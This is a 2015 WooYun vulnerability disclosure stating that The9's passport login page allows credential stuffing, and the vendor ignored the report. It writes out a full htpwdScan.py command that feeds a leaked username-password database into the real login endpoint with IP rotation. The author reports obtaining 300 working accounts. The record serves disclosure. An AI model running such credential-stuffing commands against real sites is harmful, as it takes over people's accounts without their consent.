Vulnerability Summary

Defect ID: wooyun-2015-0110115

Title: A The9 (第九城市) endpoint can be used for credential-stuffing attacks (login verified)

Vendor: The9 (第九城市)

Author: 路人甲

Submitted: 2015-04-27 15:39

Fix deadline: 2015-05-02 15:40

Published: 2015-05-02 15:40

Vulnerability type: design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-04-27: details sent to the vendor, awaiting vendor handling
2015-05-02: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

A The9 endpoint can be used for credential-stuffing attacks (login verified)

Detailed description:

Once again I ran it with lijiejie's tool:
htpwdScan.py -f=C:\Users\Administrator\Desktop\post.txt -https -database loginname,pwd=D:\data\kuzi.txt -regex="([^-]*)----([^-]*)" -err="error" -suc="success" -fip
Target: https://passport.the9.com/index.php

[Screenshot: QQ截图20150424140552.jpg]


Proof of vulnerability:

[Screenshot: QQ截图20150424140641.jpg]


The run yielded 300 accounts in total; a portion of them and a login screenshot are posted here as proof.

Fix recommendation:

Strengthen verification.

Copyright notice: when reposting, credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-05-02 15:40

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet